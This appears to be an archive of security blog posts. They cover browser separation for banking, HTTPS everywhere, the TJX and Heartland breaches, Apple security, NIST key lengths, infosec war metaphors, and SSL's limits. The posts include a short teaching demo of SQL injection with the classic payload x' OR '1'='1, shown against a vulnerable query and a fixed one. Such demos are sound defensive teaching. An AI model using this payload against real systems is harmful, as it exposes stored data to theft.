    "Use another browser" creates an ideal barrier between a browsing browser and a security browser, and Safari works pretty well in that role. It's like an air gap, or an app gap, if you like. If you are on Microsoft, you could do the same thing using IE and Firefox, or you could download Chrome.

    I've also tested it on my family ... and it is by far the easiest thing to tell them. They get it! Assume your browsing habits are risky, and don't infect your banking. This works well because my family share their computers with kids, and the kids have all been instructed not to use Safari. They get it too! They don't follow the logic, but they do follow the tool name.

    What says the popular vote? Try it and let me know. I'd be interested to hear of any cross-browser threats, as well :)


    A couple of footnotes: Firstly, belated apologies to anyone who's been tricked by the old Top Tip, for taking so long to write this one up. Secondly, I've dropped the Petnames / Trustbar Top Tip because it isn't really suitable for mass users (e.g., my mother), and these fine security tools never really attracted the attention of the browser-powers-that-be, so they died away as hobby efforts tend to do. Maybe the replacement would be "Turn on Private Browsing?"

    Posted by iang at 01:54 AM | Comments (8) | TrackBack

    March 04, 2011

    more on HTTPS everywhere -- US Senator writes to websites?!

    Normally I'd worry when a representative of the US people asked sites to adopt more security ... but here goes:

    Senator Charles Schumer is calling on major websites in the United States to make their pages more secure to protect those connecting from Wi-Fi hotspots, various media outlets are reporting.

    In a letter sent to Amazon, Twitter, Yahoo, and others, the Senator, a Democrat representing New York, asked the websites to switch to more secure HTTPS pages in order to help prevent people accessing the Internet from public connections in places like restaurants and bookstores from being targeted by hackers and identity thieves.

    "As the operator of one of the world's most popular websites, you provide a valuable service to Internet users across America," Schumer wrote, according to Tony Bradley of PCWorld. "With the privilege of serving millions of U.S. citizens, however, comes the responsibility to protect them while they are on your site."

    "Free Wi-Fi networks provide hackers, identity thieves and spammers alike with a smorgasbord of opportunities to steal private user information like passwords, usernames, and credit card information," the Senator added. "The quickest and easiest way to shut down this one-stop shop for identity theft is for major websites to switch to secure HTTPS web addresses instead of the less secure HTTP protocol, which has become a welcome mat for would be hackers."

    According to a Reuters report on Sunday, Schumer also called standard HTTP protocol "a welcome mat for would-be hackers" and said that programs were available that made it easy to hack into another person's computer and swipe private information--unless secure protocol was used.

    ...

    In this case, it's an overall plus. HTTPS everywhere, please!

    This is one way in which we can stop a lot of trouble. Somewhat depressing that it has taken this long to filter through, but with friends like NIST, one shouldn't be overly surprised if the golden goose of HTTPS security is cooked to a cinder beforehand.

    Posted by iang at 02:36 AM | Comments (3) | TrackBack

    November 15, 2010

    The Great Cyberheist

    The biggest this and the bestest that is mostly a waste of time, but once a year it is good to see just how big some of the numbers are. Jim sent in this NY Times article by James Verini, just to show that breaches cost serious money:

    According to Attorney General Eric Holder, who last month presented an award to Peretti and the prosecutors and Secret Service agents who brought Gonzalez down, Gonzalez cost TJX, Heartland and the other victimized companies more than $400 million in reimbursements and forensic and legal fees. At last count, at least 500 banks were affected by the Heartland breach.

    $400 million costs caused by one small group, or one attacker, and those costs aren't complete or known as yet.

    But the extent of the damage is unknown. “The majority of the stuff I hacked was never brought into public light,” Toey told me. One of the imprisoned hackers told me there “were major chains and big hacks that would dwarf TJX. I’m just waiting for them to indict us for the rest of them.” Online fraud is still rampant in the United States, but statistics show a major drop in 2009 from previous years, when Gonzalez was active.

    What to make of this? It may well be that one single guy / group caused the lion's share of the breach fraud we saw in the wake of SB1386. Do we breathe a sigh of relief that he's gone for good (20 years?) ... or do we wonder at the basic nature of the attacks used to get in?

    The attacks were fairly well described in the article. They were all through apparently PCI compliance-complete institutions. Lots of them. They start from the ho-hum of breaching the secured perimeter through WiFi, right up to the slightly yawnsome SQL injection.
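    SQL injection is yawnsome precisely because the fix has been known as long as the flaw: user input must stay data, never become query. A minimal sketch, with an invented table for illustration:

        # SQL injection in one screen: string-splicing versus bound parameters.
        import sqlite3

        db = sqlite3.connect(":memory:")
        db.execute("CREATE TABLE cards (pan TEXT, owner TEXT)")
        db.execute("INSERT INTO cards VALUES ('4111111111111111', 'alice')")

        evil = "x' OR '1'='1"   # classic attacker-supplied "owner name"

        # Vulnerable: the input becomes part of the SQL itself...
        leaked = db.execute(
            "SELECT pan FROM cards WHERE owner = '%s'" % evil).fetchall()
        print("spliced query leaks:", leaked)    # every row comes back

        # Fixed: the input stays data, never code.
        safe = db.execute(
            "SELECT pan FROM cards WHERE owner = ?", (evil,)).fetchall()
        print("bound query leaks:", safe)        # nothing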

    Here's my bet: the ease of this overall approach and the lack of real good security alternatives (firewalls & SSL, anyone?) means there will be a pause, and then the professionals will move in. And they won't be caught, because they'll move faster than the Feds. Gonzalez was a static target, he wasn't leaving the country. The new professionals will know their OODA.

    Read the entire article, and make your own bet :)

    Posted by iang at 04:51 AM | Comments (0) | TrackBack

    October 24, 2010

    perception versus action, when should Apple act?

    Clive throws some security complaints against Apple in comments. He's got a point, but what is that point, exactly? The issues raised have little to do with Apple, per se, as they are all generic and familiar in some sense.

    Aside from the futility of trying to damage Apple's teflon brand, I guess, for me at least the issue here is when & if the perception, costs and activities of Apple's security begin to cross.

    We saw this with Microsoft. Throughout the 1990s, they made hay, the sun shone. Security wasn't an issue, the users lapped it all up, paid the cost, asked for more.

    So Microsoft did the "right thing" by their shareholders and ignored it. Having seen how much money they made for their shareholders in those days, it is hard to argue they did the "wrong thing". Indeed, this is what I tried to establish in that counter-cultural rant called GP -- that there is an economic rationale to delaying security until we can identify a real enemy.

    Early 2000s, the scene started to change. We saw the first signs of phishing in 2001 (if we were watching) and the rising tide of costs to users was starting to feed back into Microsoft's top slot. Hence Bill Gates' famous "I want to spend another dime and spin the company" memo in January 2002, followed by his declaration that "phishing is our problem, not the user's fault."

    But it didn't work. Even though we saw a massive internal change, and lots more attention on security, the Vista thing didn't work out. And the Titanic of Microsoft perception slowly inched itself up onto an iceberg and spent half a decade sliding under the waters.

    For Microsoft, action started in 2002, and changed the company somewhat. By the mid 2000s, activity on security was impressive. But perception was already underwater, irreversibly sinking.

    Now we're all looking at Apple. *Only* because they have a bigger market cap than Microsoft. Note that this blog has promoted Macs for a better security experience for many years, and anyone who took that advice won big-time. But now the media has swung its laser-sharp eyeballs across to look at the one that snuck below their impenetrable radar and cheekily stole the crown of publicity from Microsoft. The game's up, the media tell us!

    I speak in jest of course; market perception is what the users think, not what the media says [1]. Possibly we will see market perception of Apple's security begin to diminish, as user costs begin to rise. The user-cost argument is still solidly profitable on the Mac's balance sheet, so that'll take some time. Meanwhile, there is little sign that Apple themselves are acting within to improve their impending security nightmare [2].

    The interesting question for the long term, for the business-minded, is when should Apple begin to act? And how?


    [1] Watching the media for security perception shifts is like relying on astrology for stock market picks. Using one belief system to answer the question of another belief system is only advisable for hobbyists with time on their hands and money to lose.

    [2] just as a postscript, this question is made all the more interesting because, unlike Microsoft, Apple never signals its intentions in advance. And after the move, the script is so well stage-managed that we can't rely on it. So we may never know the answer. Which makes the job of investor in Apple quite a ... perceptionally challenging one :)

    Posted by iang at 01:30 AM | Comments (1) | TrackBack

    October 05, 2010

    Cryptographic Numerology - our number is up

    Chit-chat around the coffeerooms of crypto-plumbers is disturbed by NIST's campaign to have all the CAs switch up to 2048 bit roots:

    On 30/09/10 5:17 PM, Kevin W. Wall wrote:
    > Thor Lancelot Simon wrote:
    > See below, which includes a handy pointer to the Microsoft and Mozilla policy statements "requiring" CAs to cease signing anything shorter than 2048 bits.
    <...snip...>
    > These certificates (the end-site ones) have lifetimes of about 3 years maximum. Who here thinks 1280 bit keys will be factored by 2014? *Sigh*.
    No one that I know of (unless the NSA folks are hiding their quantum computers from us :). But you can blame this one on NIST, not Microsoft or Mozilla. They are pushing the CAs to make this happen and I think 2014 is one of the important cutoff dates, such as the date that the CAs have to stop issuing certs with 1024-bit keys.

    I can dig up the NIST URL once I get back to work, assuming anyone actually cares.


    The world of cryptology has always been plagued by numerology.

    Not so much in the tearooms of the pure mathematicians, but all other areas: programming, management, provisioning, etc. It is I think a desperation in the un-endowed to understand something, anything of the topic.

    E.g., I might have no clue how RSA works but I can understand that 2048 has to be twice as good as 1024, right? When I hear it is even better than twice, I'm overjoyed!

    This desperation to be able to talk about it is partly due to having to be part of the business (write some code, buy a cert, make a security decision, sell a product) and partly a sense of helplessness when faced with apparently expert and confident advice. It's not an unfounded fear; experts use their familiarity with the concepts to also peddle other things which are frequently bogus or hopeful or self-serving, so the ignorance leads to bad choices being made.

    Those that aren't in the know are powerless, and shown to be powerless.

    When something simple comes along and fills that void people grasp onto them and won't let go. Like numbers. As long as they can compare 1024 to 2048, they have a safety blanket that allows them to ignore all the other words. As long as I can do my due diligence as a manager (ensure that all my keys are 2048) I'm golden. I've done my part, prove me wrong! Now do your part!


    This is a very interesting problem [1]. Cryptographic numerology diverts attention from the difficult to the trivial. A similar effect happens with absolute security, which we might call "divine cryptography." Managers become obsessed with perfection in one thing, to the extent that they will ignore flaws in another thing. Also, standards, which we might call "beliefs cryptography" for their ability to construct a paper cathedral within which there is room for us all, and our flock, to pray safely.

    We know divinity doesn't exist, but people demand it. We know that religions war all the time, and those within a religion will discriminate against others, to the loss of us all. We know all this, but we don't; cognitive dissonance makes us so much happier, it should be a drug.


    It was into this desperate aching void that the seminal paper by Lenstra and Verheul stepped in to put a framework on the numbers [2]. On the surface, it solved the problem of cross-domain number comparison, e.g., 512 bit RSA compared to 256 bit AES, which had always confused the managers. And to be fair, this observation was a long time coming in the cryptographic world, too, which makes L&V's paper a milestone.
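    The core of that framework is the running time of the best known attack on each primitive; for RSA moduli that is the general number field sieve, whose heuristic complexity in the modulus n is (sketching the standard formula that keylength.com-style calculators build on):

        \[
          L(n) \;=\; \exp\!\left( \left(\tfrac{64}{9}\right)^{1/3}
                     (\ln n)^{1/3} \, (\ln \ln n)^{2/3} \right)
        \]

    Plugging 1024- and 2048-bit moduli into that formula gives the familiar rough equivalences of about 80 and 112 bits of symmetric strength respectively, which is why doubling the modulus is "even better than twice" as good against factoring, while costing far more than twice the compute to use.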

    Cryptographic Numerology's star has been on the ascent ever since that paper: As well as solving the cipher-public-key-hash numeric comparison trap, numerology is now graced with academic respectability.

    This made it irresistible to large institutions which are required to keep their facade of advice up. NIST like all the other agencies followed, but NIST has a couple of powerful forces on it. Firstly, NIST is slightly special, in ways that other agencies represented in keylength.com only wish to be special. NIST, as pushed by the NSA, is protecting primarily US government resources:

    This document has been developed by the National Institute of Standards and Technology (NIST) in furtherance of its statutory responsibilities under the Federal Information Security Management Act (FISMA) of 2002, Public Law 107-347. NIST is responsible for developing standards and guidelines, including minimum requirements, for providing adequate information security for all agency operations and assets, but such standards and guidelines shall not apply to national security systems.

    That's US not us. It's not even protecting USA industry. NIST is explicitly targeted by law to protect the various multitude of government agencies that make up the beast we know as the Government of the United States of America. That gives it unquestionable credibility.

    And, as has been noticed a few times, Mars is on the ascendancy: *Cyberwarfare* is the second special force. Whatever one thinks of the mess called cyberwarfare (equity disaster, stuxnet, cryptographic astrology, etc) we can probably agree that if anyone bad is thinking in terms of cracking 1024 bit keys, they'll likely be another nation-state taking aim against the USG agencies. c.f., stuxnet, which is emerging as a state v. state adventure. USG, or one of USG's opposing states, is probably the leading place on the planet that would face a serious 1024 bit threat if one were to emerge.

    Hence, NIST is plausibly right in imposing 2048-bit RSA keys into its security model. And they are not bad in the work they do, for their client [3]. Numerology and astrology are in alignment today, if your client is from Washington DC.

    However, real or fantastical, this is a threat model that simply doesn't apply to the rest of the world. The sad sad fact is that NIST's threat model belongs to them, to US, not to us. We all adopting the NIST security model is like a Taurus following the advice in the Aries section of today's paper. It's not right, however wise it sounds. And if applied without thought, it may reduce our security not improve it:


    Writes Thor:
    > At 1024 bits, it is not. But you are looking
    > at a factor of *9* increase in computational
    > cost when you go immediately to 2048 bits. At
    > that point, the bottleneck for many applications
    > shifts, particularly those ...
    > Also,...
    > ...and suddenly...
    >
    > This too will hinder the deployment of "SSL everywhere",...
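    Thor's factor of *9* is easy to check for yourself: RSA private-key operations scale roughly with the cube of the modulus length, and (2048/1024)^3 = 8, call it 9 with overheads. A rough benchmark sketch (mine, not Thor's), assuming the third-party pyca `cryptography` package:

        # Rough check: cost of RSA private-key operations at 1024 vs 2048 bits.
        # Expect the 2048-bit signing loop to run very roughly 8-9x slower.
        import time
        from cryptography.hazmat.primitives import hashes
        from cryptography.hazmat.primitives.asymmetric import rsa, padding

        def sign_rate(bits, rounds=200):
            key = rsa.generate_private_key(public_exponent=65537, key_size=bits)
            start = time.perf_counter()
            for _ in range(rounds):
                key.sign(b"handshake-sized blob", padding.PKCS1v15(),
                         hashes.SHA256())
            return rounds / (time.perf_counter() - start)

        for bits in (1024, 2048):
            print(bits, "bit:", round(sign_rate(bits)), "signs/sec")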

    When US industry follows NIST, and when worldwide industry follows US industry, and when open source Internet follows industry, we have a classic text-book case of adopting someone else's threat, security and business models without knowing it.

    Keep in mind, our threat model doesn't include crunching 1024s. At all, any time, nobody's ever bothered to crunch 512 in anger, against the commercial or private world. So we're pretty darn safe at 1024. But our threat model does include

    *attacks on poor security user interfaces in online banking*

    That's a clear and present danger. And one of the key, silent, killer causes of that is the sheer rarity of HTTPS. If we can move the industry to "HTTPS everywhere" then we can make a significant difference. To our security.

    On the other hand, we can shift to 2048, kill the move to "HTTPS everywhere", and save the US Government from losing sleep over the cyberwarfare it created for itself (c.f., the equity failure).

    And that's what's going to happen. Cryptographic Numerology is on a roll, NIST's dice are loaded, our number is up. We have breached the law of unintended consequences, and we are going to be reducing the security of the Internet because of it. Thanks, NIST! Thanks, Mozilla, thanks, Microsoft.



    [1] As well as this area, others have looked at how to make the bounty of cryptography more safely available to the non-cognoscenti. I especially push the aphorisms of Adi Shamir and Kerckhoffs. And, add my own meagre efforts in Hypotheses and Pareto-secure.

    [2] For detailed work and references on Lenstra & Verheul's paper, see http://www.keylength.com/ which includes calculators of many of the various efforts. It's a good paper. They can't be criticised for it in the terms of this post; it's the law of unintended consequences again.

    [3] Also, other work by NIST to standardise the PRNG (pseudo-random-number-generator) has to be applauded. The subtlety of what they have done is only becoming apparent after much argumentation: they've unravelled the unprovable entropy problem by unplugging it from the equation.

    But they've gone a step further than the earlier leading work by Ferguson and Schneier and the various quiet cryptoplumbers, by turning the PRNG into a deterministic algorithm. Indeed, we can now see something special: NIST has turned the PRNG into a reverse-cycle message digest. Entropy is now the MD's document, and the psuedo-randomness is the cryptographically-secure hash that spills out of the algorithm.

    Hey Presto! The PRNG is now the black box that provides the one-way expansion of the document. It's not the reverse-cycle air conditioning of the message digest that is exciting here, it's the fact that it is now a new class of algorithms. It can be specified, parameterised, and most importantly for cryptographic algorithms, given test data to prove the coding is correct.

    (I use the term reverse-cycle in the sense of air-conditioning. I should also stress that this work took several generations to get to where it is today; including private efforts by many programmers to make sense of PRNGs and entropy by creating various application designs, and a couple of papers by Ferguson and Schneier. But it is the black-boxification by NIST that took the critical step that I'm lauding today.)
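    The black-box point is easiest to see in code. Below is a toy deterministic generator in the spirit of (but not conforming to) NIST's HMAC-style DRBGs: feed it a fixed entropy "document" and it must produce a fixed, testable stream, which is exactly what makes the coding provable with test vectors.

        # Toy deterministic PRNG: entropy in, reproducible stream out.
        # In the spirit of NIST's HMAC_DRBG, but a sketch, not the spec.
        import hmac, hashlib

        class TinyDRBG:
            def __init__(self, entropy):
                self.key = hashlib.sha256(entropy).digest()  # digest the "document"
                self.val = b"\x01" * 32

            def generate(self, nbytes):
                out = b""
                while len(out) < nbytes:
                    self.val = hmac.new(self.key, self.val, hashlib.sha256).digest()
                    out += self.val
                return out[:nbytes]

        # Same entropy, same stream -- so the implementation can be tested
        # against fixed vectors, unlike an "unprovable" raw entropy tap.
        assert TinyDRBG(b"seed").generate(32) == TinyDRBG(b"seed").generate(32)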

    Posted by iang at 10:55 AM | Comments (1) | TrackBack

    August 24, 2010

    What would the auditor say to this?

    Iran's Bushehr nuclear power plant in Bushehr Port:

    "An error is seen on a computer screen of Bushehr nuclear power plant's map in the Bushehr Port on the Persian Gulf, 1,000 kms south of Tehran, Iran on February 25, 2009. Iranian officials said the long-awaited power plant was expected to become operational last fall but its construction was plagued by several setbacks, including difficulties in procuring its remaining equipment and the necessary uranium fuel. (UPI Photo/Mohammad Kheirkhah)"

    Click onwards for full sized image:

    Compliant? Minor problem? Slight discordance? Conspiracy theory?

    (spotted by Steve Bellovin)

    Posted by iang at 05:53 AM | Comments (2) | TrackBack

    August 12, 2010

    memes in infosec II - War! Infosec is WAR!

    Another metaphor (I) that has gained popularity is that infosec is much like war. There are some reasons for this: there is an aggressive attacker out there who is trying to defeat you. Which tends to muck up a lot of statistical, error-based thinking in IT, a lot of business process, and as well, most economic models (e.g., asymmetric information assumes a simple two-party model). Another reason is the current beltway push for an essential cyberwarfare divisional budget, although I'd hasten to say that this is not a good reason, just a reason. Which is to say, it's all blather, FUD, and one-upmanship against the Chinese, same as it ever was with Eisenhower's nemesis.

    Having said that, infosec isn't like war in many ways. And knowing when and why and how is not a trivial thing. So, drawing from military writings is not without dangers. Consider these laments about applying Sun Tzu's The Art of War to infosec from Steve Tornio and Brian Martin:

    In "The Art of War," Sun Tzu's writing addressed a variety of military tactics, very few of which can truly be extrapolated into modern InfoSec practices. The parts that do apply aren't terribly groundbreaking and may actually conflict with other tenets when artificially applied to InfoSec. Rather than accept that Tzu's work is not relevant to modern day Infosec, people tend to force analogies and stretch comparisons to his work. These big leaps are professionals whoring themselves just to get in what seems like a cool reference and wise quote.

    "The art of war teaches us to rely not on the likelihood of the enemy's not coming, but on our own readiness to receive him; not on the chance of his not attacking, but rather on the fact that we have made our position unassailable." - The Art of War

    The Art of War is not for literal quoting and thence a mad rush to build the tool. It was written from the context of a successful general talking to another hopeful general on the general topic of building an army for a set-piece nation-to-nation confrontation. It was also very short.

    Art of War tends to interlace high level principles with low level examples, and dance very quickly through most of its lessons. Hence it was very easy to misinterpret, and equally easy to "whore oneself for a cool & wise quote."

    However, Sun Tzu still stands tall in the face of such disrespect, as it says things like know yourself FIRST, and know the enemy SECOND, which the above essay actually agreed with. And, as if it needs to be said, knowing the enemy does not imply knowing their names, locations, genders, and proclivities:

    Do you know your enemy? If you answer 'yes' to that question, you already lost the battle and the war. If you know some of your enemies, you are well on your way to understanding why Tzu's teachings haven't been relevant to InfoSec for over two decades. Do you want to know your enemy? Fine, here you go. your enemy may be any or all of the following:

    • 12 y/o student in Ohio learning computers in middle school
    • 13 y/o home-schooled girl getting bored with social networks
    • 15 y/o kid in Brazil that joined a defacement group
    • ...

    Of course, Sun Tzu also didn't know the sordid details of every soldier's desires; "knowing" isn't biblical, it's capable. Or rather, it is knowing their capabilities, and that can be done: we call it risk management. As Jeffrey Carr said:

    The reason why you don't know how to assign or even begin to think about attribution is because you are too consumed by the minutia of your profession. ... The only reason why some (OK, many) InfoSec engineers haven't put 2+2 together is that their entire industry has been built around providing automated solutions at the microcosmic level. When that's all you've got, you're right - you'll never be able to claim victory.

    Right. Almost all InfoSec engineers are hired to protect existing installations. The solution is almost always boxed into the defensive, siege mentality described above, because the alternative, as Dan Geer apparently said, is this:

    When you are losing a game that you cannot afford to lose, change the rules. The central rule today has been to have a shield for every arrow. But you can't carry enough shields and you can run faster with fewer anyhow.

    The advanced persistent threat, which is to say the offense that enjoys a permanent advantage and is already funding its R&D out of revenue, will win as long as you try to block what he does. You have to change the rules. You have to block his success from even being possible, not exchange volleys of ever better tools designed in response to his. You have to concentrate on outcomes, you have to pre-empt, you have to be your own intelligence agency, you have to instrument your enterprise, you have to instrument your data.

    But, at a corporate level, that's simply not allowed. Great ideas, but only the achievable strategy is useful, the rest is fantasy. You can't walk into any company or government department and change the rules of infosec -- that means rebuilding the apps. You can't even get any institution to agree that their apps are insecure; or, you can get silent agreement by embarrassing them in the press, along with being fired!

    I speak from pretty good experience of building secure apps, and of looking at other institutional or enterprise apps and packages. The difference is huge. It's the difference between defeating Japan and defeating Vietnam. One was a decision of maximisation, the other of minimisation. It's the difference between engineering and marketing; one is solid physics, the other is facade, faith, FUD, bribes.

    It's the difference between setting up a world-beating sigint division, and fixing your own sigsec. The first is a science, and responds well by adding money and people. Think Manhattan, Bletchley Park. The second is a societal norm, and responds only to methods generally classed by the defenders as crimes against humanity and applications. Slavery, colonialism, discrimination, the great firewall of China, if you really believe in stopping these things, then you are heading for war with your own people.

    Which might all lead the grumpy anti-Sun Tzu crowd to say, "told you so! This war is unwinnable." Well, not quite. The trick is to decide what winning is; to impose your will on the battleground. This is indeed what strategy is, to impose one's own definition of the battleground on the enemy, and be right about it, which is partly what Dan Geer is getting at when he says "change the rules." A more nuanced view would be: to set the rules that win for you; and to make them the rules you play by.

    And, this is pretty easily answered: for a company, winning means profits. As long as your company can conduct its strategy in the face of affordable losses, then it's winning. Think credit cards, which sacrifice a few hundred basis points for the greater good. It really doesn't matter how much of a loss is made, as long as the customer pays for it and leaves a healthy profit over.

    Relevance to Sun Tzu? The parable of the Emperor's Concubines!

    In summary, it is fair to say that Sun Tzu is one of those texts that are easy to bandy around, but rather hard to interpret. Same as infosec, really, so it is no surprise we see it in that world. Also, war is a very complicated business, and Art of War was really written for that messy discipline ... so it takes somewhat more than a passing familiarity with both to relate them beyond the level of simple metaphor.

    And, as we know, metaphors and analogues are descriptive tools, not proofs. Proving them wrong proves nothing more than you're now at least an adolescent.

    Finally, even war isn't much like war these days. If one factors in the last decade, there is a clear pattern of unilateral decisions, casus belli at a price, futile targets, and effervescent gains. Indeed, infosec looks more like the low intensity, mission-shy wars in the Eastern theaters than either of them look like Sun Tzu's campaigns.

    memes in infosec I - Eve and Mallory are missing, presumed dead

    Posted by iang at 04:34 PM | Comments (1) | TrackBack

    August 11, 2010

    Hacking the Apple, when where how... and whether we care why?

    One of the things that has been pretty much standard in infosec is that the risks earnt (costs incurred!) from owning a Mac have been dramatically lower. I do it, and save, and so do a lot of my peers & friends. I don't collect stats, but here's a comment from Dan Geer from 2005:

    Amongst the cognoscenti, you can see this: at security conferences of all sorts you’ll find perhaps 30% of the assembled laptops are Mac OS X, and of the remaining Intel boxes, perhaps 50% (or 35% overall) are Linux variants. In other words, while security conferences are bad places to use a password in the clear over a wireless channel, there is approximately zero chance of cascade failure amongst the participants.

    I recommend it on the blog front page as the number 1 security tip of all:

    #1 buy a mac.

    Why this is the case is of course a really interesting question. Is it because Macs are inherently more secure, in themselves? The answer seems to be No, not in themselves. We've seen enough evidence to suggest, at an anecdotal level, that when put into a fair fight, the Macs don't do any better than the competition. (Sometimes they do worse, and the competition ensures those results are broadcast widely :)

    However it is still the case that the while the security in the Macs aren't great, the result for the user is better -- the costs resulting from breaches, installs, virus slow-downs, etc, remain lower [1]. Which would imply the threats are lower, recalling the old mantra of:

    Business model ⇒ threat model ⇒ security model

    Now, why is the threat (model) lower? It isn't because the attackers are fans. They generally want money, and money is neutral.

    One theory that might explain it is the notion of monoculture.

    This idea was captured a while back by Dan Geer and friends in a paper that claimed that Microsoft's dominance threatened the national security of the USA. It certainly threatened someone, as Dan lost his job the day the paper was released [2].

    In brief, monoculture argues that when one platform gains an ascendency to dominate the market, then we enter a situation of particular vulnerability to that platform. It becomes efficient for all economically-motivated attackers to concentrate their efforts on that one dominant platform and ignore the rest.

    In a sense, this is an application of the Religion v. Darwin argument to computer security. Darwin argued that diversity was good for the species as a whole, because singular threats would wipe out singular species. The monoculture critique can also be seen as analogous to Capitalism v. Communism, where the former advances through creative destruction, and the latter stagnates through despotic ignorance.

    A lot of us (including me) looked at the monoculture argument and thought it ... simplistic and hopeful. Yet, the idea hangs on ... so the question shifts for us slower skeptics to how to prove it [3]?

    Apple is quietly wrestling with a security conundrum. How the company handles it could dictate the pace at which cybercriminals accelerate attacks on iPhones and iPads.

    Apple is hustling to issue a patch for a milestone security flaw that makes it possible to remotely hack - or jailbreak - iOS, the operating system for iPhones, iPads and iPod Touch.

    Apple's new problem is perhaps an early sign that the theory is good. Here we have Apple struggling with hacks on its mobile platform (iPads, iPods, iPhones) and facing a threat which it seemingly hasn't faced on the Macs [4].

    The differentiating factor -- other than the tech stuff -- is that Apple is leading in the mobile market.

    IPhones, in particular, have become a pop culture icon in the U.S., and now the iPad has grabbed the spotlight. "The more popular these devices become, the more likely they are to get the attention of attackers," says Joshua Talbot, intelligence manager at Symantec Security Response.

    Not dominating like Microsoft used to enjoy, but presenting enough of a nose above the parapet to get a shot taken. Meanwhile, Macs remain stubbornly stuck at a reported 5% of market share in the computer field, regardless of the security advice [5]. And nothing much happens to them.

    If market leadership continues to accrue to Apple in the iP* mobile sector, as the market expect it does, and if security woes continue as well, I'd count that as good evidence [6].


    [1] #1 security tip remains good: buy a Mac, not because of the security but because of the threats. Smart users don't care so much why, they just want to benefit this year, this decade, while they can.

    [2] Perhaps because Dan lost his job, he gets fuller attention. The full cite would be like: Daniel Geer, Rebecca Bace, Peter Gutmann, Perry Metzger, Charles P. Pfleeger, John S. Quarterman, Bruce Schneier, "CyberInsecurity: The Cost of Monopoly How the Dominance of Microsoft's Products Poses a Risk to Security." Preserved by the inestimable cryptome.org, a forerunner of the now infamous wikileaks.org.

    [3] Proof in the sense of the scientific method is not possible, because this is economics, not science: we can't run the experiment like real scientists. What we have to do is perhaps pseudo-scientific method; we predict, we wait, and we observe.

    [4] On the other hand, maybe the party is about to end for Macs. News just in:

    Security vendor M86 Security says it's discovered that a U.K.-based bank has suffered almost $900,000 (675,000 Euros) in fraudulent bank-funds transfers due to the ZeuS Trojan malware that has been targeting the institution.

    Bradley Anstis, vice president of technology strategy at M86 Security, said the security firm uncovered the situation in late July while tracking how one ZeuS botnet had been specifically going after the U.K.-based bank and its customers. The botnet included a few hundred thousand PCs and even about 3,000 Apple Macs, and managed to steal funds from about 3,000 customer accounts through unauthorized transfers equivalent to roughly $892,755.

    Ouch!

    [5] I don't believe the 5% market share claim ... I harbour a suspicion that this is some very cunning PR trick in under-reporting by Apple, so as to fly below the radar. If so, I think it's well past its sell-by date since Apple reached the same market cap as Microsoft...

    [6] What is curious is that I'll bet most of Wall Street, and practically all of government, notwithstanding the "national security" argument, continue to keep clear of Macs. For those of us who know the trick, this is good. It is good for our security if the governments do not invest in Macs, and keep the monoculture effect positive. Perverse, but who am I to argue with the wisdom in cyber-security circles?

    Posted by iang at 09:30 AM | Comments (1) | TrackBack

    August 05, 2010

    Are we spending too little on security? Or are we spending too much??

    Luther Martin asks this open question:


    Ian,

    I have a quick question for you based on some recent discussions. Here's the background.

    The first was with a former co-worker who works for the VC division of a large commercial bank. He tells me that his bank really isn't interested in investing in security companies. Why? Apparently for each $100 of credit card transactions there's about $4 of loss due to bad debt and only about $0.10 of loss due to fraud. So if you're making investments, it's clear where you should put your money.

    Next, I was talking with a guy who runs a large credit card processing business. He was complaining about having to spend an extra $6 million on fraud reduction while his annual losses due to fraud are only about $250K.

    Finally, I was also talking to some people from a government agency who were proud of the fact that they had reduced losses due to security incidents in their division by $2 million last year. The only problem is that they actually spent $10 million to do this.

    So the question is this: are we not spending enough on security or are we spending too much, but on the wrong things?

    Luther
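    For what the raw arithmetic is worth (my framing, not Luther's), the three anecdotes put numbers directly on both sides of the question:

        # Luther's three anecdotes, as naive return-on-security-spend arithmetic.
        bank_fraud, bank_bad_debt = 0.10, 4.00      # per $100 of transactions
        print("fraud is", bank_fraud / bank_bad_debt, "of the bad-debt problem")

        processor_spend, processor_losses = 6_000_000, 250_000
        print("payback:", processor_spend / processor_losses, "years of fraud")

        agency_spend, agency_saved = 10_000_000, 2_000_000
        print("agency net:", agency_saved - agency_spend, "dollars")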

    Posted by iang at 10:38 PM | Comments (6) | TrackBack

    August 01, 2010

    memes in infosec I - Eve and Mallory are missing, presumed dead

    Things I've seen that are encouraging. Bruce Schneier in Q&A:

    Q: We've also seen Secure Sockets Layer (SSL) come under attack, and some experts are saying it is useless. Do you agree?

    A: I'm not convinced that SSL has a problem. After all, you don't have to use it. If I log-on to Amazon without SSL the company will still take my money. The problem SSL solves is the man-in-the-middle attack with someone eavesdropping on the line. But I'm not convinced that's the most serious problem. If someone wants your financial data they'll hack the server holding it, rather than deal with SSL.

    Right. The essence is that SSL solves the "easy" part of the problem, and leaves open the biggest part. Before the proponents of SSL say, "not our problem," remember that AADS did solve it, as did SOX and a whole bunch of other things. It's called end-to-end, and is well known as being the only worthwhile security. Indeed, I'd say it was simply responsible engineering, except for the fact that it isn't widely practiced.

    OK, so this is old news, from around March, but it is worth declaring sanity:

    Q: But doesn't SSL give consumers confidence to shop online, and thus spur e-commerce?

    A: Well up to a point, but if you wanted to give consumers confidence you could just put a big red button on the site saying 'You're safe'. SSL doesn't matter. It's all in the database. We've got the threat the wrong way round. It's not someone eavesdropping on Eve that's the problem, it's someone hacking Eve's endpoint.

    Which is to say, if you are going to do anything to fix the problem, you have to look at the end-points. The only time you should look at the protocol, and the certificates, is how well they are protecting the end-points. Meanwhile, the SSL field continues to be one for security researchers to make headlines over. It's BlackHat time again:

    "The point is that SSL just doesn't do what people think it does," says Hansen, an security researcher with SecTheory who often goes by the name RSnake. Hansen split his dumptruck of Web-browsing bugs into three categories of severity: About half are low-level threats, 10 or so are medium, and two are critical. One example...

    Many observers in the security world have known this for a while, and everyone else has felt increasingly frustrated and despondent about the promise:

    There has been speculation that an organization with sufficient power would be able to get a valid certificate from one of the 170+ certificate authorities (CAs) that are installed by default in the typical browser and could then avoid this alert ....

    But how many CAs does the average Internet user actually need? Fourteen! Let me explain. For the past two weeks I have been using Firefox on Windows with a reduced set of CAs. I disabled ALL of them in the browser and re-enabled them one by one as necessary during my normal usage....


    On the one hand, SSL is the brand of security. On the other hand, it isn't the delivery of security; it simply isn't deployed in secure browsing to provide the user security that was advertised: you are on the site you think you are on. Only as we moved from a benign world to a fraud world, around 2003-2005, has this been shown to matter. Bruce goes on:

    Q: So is encryption the wrong approach to take?

    A: This kind of issue isn't an authentication problem, it's a data problem. People are recognising this now, and seeing that encryption may not be the answer. We took a World War II mindset to the internet and it doesn't work that well. We thought encryption would be the answer, but it wasn't. It doesn't solve the problem of someone looking over your shoulder to steal your data.

